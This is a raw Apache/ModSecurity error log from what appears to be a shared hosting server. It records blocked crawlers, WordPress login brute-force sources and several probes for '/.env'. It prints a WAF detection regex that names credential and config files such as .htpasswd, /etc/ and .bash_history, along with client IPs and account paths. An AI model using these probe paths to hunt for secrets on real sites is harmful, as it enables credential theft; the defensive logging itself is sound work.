[Tue May 26 17:01:26.170960 2026] [security2:error] [pid 851641:tid 851850] [client 16.148.188.168:43026] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.codealtis.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWEjhp8QSN2510avp4TAgAAT24"]
[Tue May 26 17:01:26.196582 2026] [security2:error] [pid 851641:tid 851755] [remote 74.7.241.58:54658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahWEjhp8QSN2510avp4TBAAADnE"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 17:01:27.833296 2026] [security2:error] [pid 851641:tid 851867] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEjxp8QSN2510avp4TJgAAAGA"]
[Tue May 26 17:01:29.840765 2026] [security2:error] [pid 851641:tid 851783] [client 15.235.98.105:57486] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.chettinadavenue.com"] [uri "/robots.txt"] [unique_id "ahWEkRp8QSN2510avp4TdQAAAAw"]
[Tue May 26 17:01:29.840890 2026] [security2:error] [pid 851641:tid 851783] [client 15.235.98.105:57486] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.chettinadavenue.com"] [uri "/robots.txt"] [unique_id "ahWEkRp8QSN2510avp4TdQAAAAw"]
[Tue May 26 17:01:29.974562 2026] [security2:error] [pid 851641:tid 851858] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEkRp8QSN2510avp4TaQAAAFc"]
[Tue May 26 17:01:31.171924 2026] [autoindex:error] [pid 851641:tid 851807] [client 147.185.132.99:64360] AH01276: Cannot serve directory /home2/abili6ui/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:01:31.204745 2026] [security2:error] [pid 851641:tid 851857] [client 15.235.96.44:25474] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.chettinadavenue.com"] [uri "/"] [unique_id "ahWEkxp8QSN2510avp4TnwAAAFY"]
[Tue May 26 17:01:31.204917 2026] [security2:error] [pid 851641:tid 851857] [client 15.235.96.44:25474] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.chettinadavenue.com"] [uri "/"] [unique_id "ahWEkxp8QSN2510avp4TnwAAAFY"]
[Tue May 26 17:01:31.685494 2026] [security2:error] [pid 851641:tid 851886] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEkxp8QSN2510avp4TpAAAAHM"]
[Tue May 26 17:01:32.530610 2026] [security2:error] [pid 851641:tid 851777] [client 114.119.135.136:63627] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "whitesun.in"] [uri "/1hfq/raid-shadow-legends-rare-champion-drop-rate.html"] [unique_id "ahWElBp8QSN2510avp4TyAAAAAY"], referer: https://whitesun.in/1hfq/raid-shadow-legends-rare-champion-drop-rate.html
[Tue May 26 17:01:33.022104 2026] [security2:error] [pid 851641:tid 851842] [client 190.228.84.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWElBp8QSN2510avp4TywAAAEc"]
[Tue May 26 17:01:34.188026 2026] [security2:error] [pid 851641:tid 851810] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWElRp8QSN2510avp4T8QAAACc"]
[Tue May 26 17:01:35.745231 2026] [security2:error] [pid 851641:tid 851892] [client 170.199.228.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWElxp8QSN2510avp4ULgAAAHk"], referer: https://www.anujtradingco.com/
[Tue May 26 17:01:36.244798 2026] [security2:error] [pid 851641:tid 851791] [client 114.119.137.204:40813] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rainadelproperties.com"] [uri "/properties/office-space-central-ave"] [unique_id "ahWEmBp8QSN2510avp4UQgAAABQ"], referer: https://rainadelproperties.com/listings/offices
[Tue May 26 17:01:36.319525 2026] [security2:error] [pid 851641:tid 851876] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWElxp8QSN2510avp4UNAAAAGk"]
[Tue May 26 17:01:37.342691 2026] [security2:error] [pid 851641:tid 851779] [client 170.199.228.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWEmRp8QSN2510avp4UagAAAAg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1229737&moderation-hash=c4c229f211cf29d37e945cb881081dd4
[Tue May 26 17:01:37.430678 2026] [security2:error] [pid 851641:tid 851801] [client 74.7.241.172:50832] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "www.demo.sbvschools.com"] [uri "/index.php"] [unique_id "ahWEmBp8QSN2510avp4UWwAAHhg"]
[Tue May 26 17:01:38.341890 2026] [security2:error] [pid 851641:tid 851797] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEmRp8QSN2510avp4UigAAABo"]
[Tue May 26 17:01:38.665373 2026] [security2:error] [pid 851641:tid 851685] [remote 88.198.165.116:40668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWEmhp8QSN2510avp4UmwAAAys"]
[Tue May 26 17:01:38.918931 2026] [security2:error] [pid 851641:tid 851895] [client 51.75.236.129:21176] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "singhcouriercargo.com"] [uri "/robots.txt"] [unique_id "ahWEmhp8QSN2510avp4UtgAAAHw"]
[Tue May 26 17:01:38.919036 2026] [security2:error] [pid 851641:tid 851895] [client 51.75.236.129:21176] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "singhcouriercargo.com"] [uri "/robots.txt"] [unique_id "ahWEmhp8QSN2510avp4UtgAAAHw"]
[Tue May 26 17:01:39.759920 2026] [security2:error] [pid 851641:tid 851817] [client 114.119.150.15:25497] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ucdc.co.in"] [uri "/lander"] [unique_id "ahWEmxp8QSN2510avp4U3gAAAC4"], referer: https://www.ucdc.co.in/lander
[Tue May 26 17:01:40.654187 2026] [security2:error] [pid 851641:tid 851855] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEnBp8QSN2510avp4U7wAAAFQ"]
[Tue May 26 17:01:40.667664 2026] [security2:error] [pid 851641:tid 851751] [remote 121.200.216.55:32820] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWEnBp8QSN2510avp4VIAAAK20"]
[Tue May 26 17:01:41.561606 2026] [security2:error] [pid 851641:tid 851897] [client 51.161.65.16:62550] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "singhcouriercargo.com"] [uri "/"] [unique_id "ahWEnRp8QSN2510avp4VTgAAAH4"]
[Tue May 26 17:01:41.561715 2026] [security2:error] [pid 851641:tid 851897] [client 51.161.65.16:62550] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "singhcouriercargo.com"] [uri "/"] [unique_id "ahWEnRp8QSN2510avp4VTgAAAH4"]
[Tue May 26 17:01:43.223939 2026] [security2:error] [pid 851641:tid 851798] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEnhp8QSN2510avp4VdAAAABs"]
[Tue May 26 17:01:43.315901 2026] [security2:error] [pid 851641:tid 851792] [client 176.65.139.229:45862] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "d2cargo.com.onesoft.in"] [uri "/.env"] [unique_id "ahWEnxp8QSN2510avp4VkQAAABU"]
[Tue May 26 17:01:44.051765 2026] [security2:error] [pid 851641:tid 851817] [client 110.249.201.72:64048] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "krishnawoodworks.com"] [uri "/robots.txt"] [unique_id "ahWEoBp8QSN2510avp4VzgAAAC4"]
[Tue May 26 17:01:44.778258 2026] [security2:error] [pid 851641:tid 851850] [client 176.65.139.233:32100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco-usa.vcresco.com"] [uri "/.env"] [unique_id "ahWEoBp8QSN2510avp4V8AAAAE8"]
[Tue May 26 17:01:45.182527 2026] [security2:error] [pid 851641:tid 851879] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEoBp8QSN2510avp4V7AAAAGw"]
[Tue May 26 17:01:46.056218 2026] [security2:error] [pid 851641:tid 851826] [client 216.244.66.243:32808] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "wphotonics.com.md-74.webhostbox.net"] [uri "/robots.txt"] [unique_id "ahWEohp8QSN2510avp4WJQAAADc"]
[Tue May 26 17:01:46.056425 2026] [security2:error] [pid 851641:tid 851826] [client 216.244.66.243:32808] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "wphotonics.com.md-74.webhostbox.net"] [uri "/robots.txt"] [unique_id "ahWEohp8QSN2510avp4WJQAAADc"]
[Tue May 26 17:01:46.576688 2026] [security2:error] [pid 851641:tid 851864] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEohp8QSN2510avp4WLwAAAF0"]
[Tue May 26 17:01:48.398373 2026] [security2:error] [pid 851641:tid 851718] [remote 209.42.18.223:43554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWEpBp8QSN2510avp4WcwAAfkw"]
[Tue May 26 17:01:49.604496 2026] [security2:error] [pid 851641:tid 851811] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEpRp8QSN2510avp4WjgAAACg"]
[Tue May 26 17:01:50.216359 2026] [security2:error] [pid 851641:tid 851890] [client 176.65.139.232:64082] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/.env"] [unique_id "ahWEphp8QSN2510avp4WqQAAAHc"]
[Tue May 26 17:01:50.361009 2026] [security2:error] [pid 851641:tid 851744] [remote 125.99.184.138:34082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.184.99.125.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWEphp8QSN2510avp4WqAAAemY"]
[Tue May 26 17:01:50.457656 2026] [security2:error] [pid 851641:tid 851741] [remote 163.61.60.30:59850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.60.61.163.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWEphp8QSN2510avp4WsAAAMGM"]
[Tue May 26 17:01:50.906020 2026] [security2:error] [pid 851641:tid 851882] [client 64.233.173.231:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahWEphp8QSN2510avp4WswAAAG8"]
[Tue May 26 17:01:51.250292 2026] [security2:error] [pid 851641:tid 851778] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEphp8QSN2510avp4WwQAAAAc"]
[Tue May 26 17:01:52.890784 2026] [security2:error] [pid 851641:tid 851798] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEqBp8QSN2510avp4W8gAAABs"]
[Tue May 26 17:01:54.790197 2026] [security2:error] [pid 851641:tid 851884] [client 14.176.13.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWEqhp8QSN2510avp4XUgAAAHE"]
[Tue May 26 17:01:54.990458 2026] [security2:error] [pid 851641:tid 851762] [remote 82.196.25.136:59696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWEqhp8QSN2510avp4XVAAAR3g"]
[Tue May 26 17:01:55.539923 2026] [autoindex:error] [pid 851641:tid 851850] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 17:01:55.695107 2026] [security2:error] [pid 851641:tid 851869] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWEqxp8QSN2510avp4XYAAAAGI"]
[Tue May 26 17:01:55.748640 2026] [security2:error] [pid 851641:tid 851897] [client 43.250.164.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWEqxp8QSN2510avp4XjQAAAH4"], referer: https://www.ucdc.co.in/
[Tue May 26 17:01:56.117992 2026] [security2:error] [pid 851641:tid 851643] [remote 209.42.18.223:34402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.18.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWErBp8QSN2510avp4XkwAAeAE"]
[Tue May 26 17:01:58.191745 2026] [security2:error] [pid 851641:tid 851780] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWErRp8QSN2510avp4X5gAAAAk"]
[Tue May 26 17:01:58.987838 2026] [security2:error] [pid 851641:tid 851806] [client 195.178.110.204:47440] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "208.91.199.245"] [uri "/index.cgi"] [unique_id "ahWErhp8QSN2510avp4YTgAAACM"]
[Tue May 26 17:01:59.382597 2026] [security2:error] [pid 851641:tid 851809] [client 185.191.171.7:21944] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/list/"] [unique_id "ahWErxp8QSN2510avp4YWwAAACY"]
[Tue May 26 17:01:59.382959 2026] [security2:error] [pid 851641:tid 851809] [client 185.191.171.7:21944] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school/list/"] [unique_id "ahWErxp8QSN2510avp4YWwAAACY"]
[Tue May 26 17:01:59.552256 2026] [security2:error] [pid 851641:tid 851798] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWErxp8QSN2510avp4YUQAAABs"]
[Tue May 26 17:01:59.754165 2026] [security2:error] [pid 851641:tid 851812] [client 74.7.228.23:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahWErxp8QSN2510avp4YZAAAACk"]
[Tue May 26 17:01:59.862057 2026] [security2:error] [pid 851641:tid 851884] [client 74.7.228.23:38328] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.cagmedya.com"] [uri "/robots.txt"] [unique_id "ahWErxp8QSN2510avp4YYgAAcR8"]
[Tue May 26 17:01:59.889732 2026] [security2:error] [pid 851641:tid 851833] [client 37.27.105.41:18948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 41.105.27.37.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWErxp8QSN2510avp4YZQAAAD4"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 17:02:00.596168 2026] [security2:error] [pid 851641:tid 851853] [client 216.73.217.81:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWErhp8QSN2510avp4YLAAAUkY"]
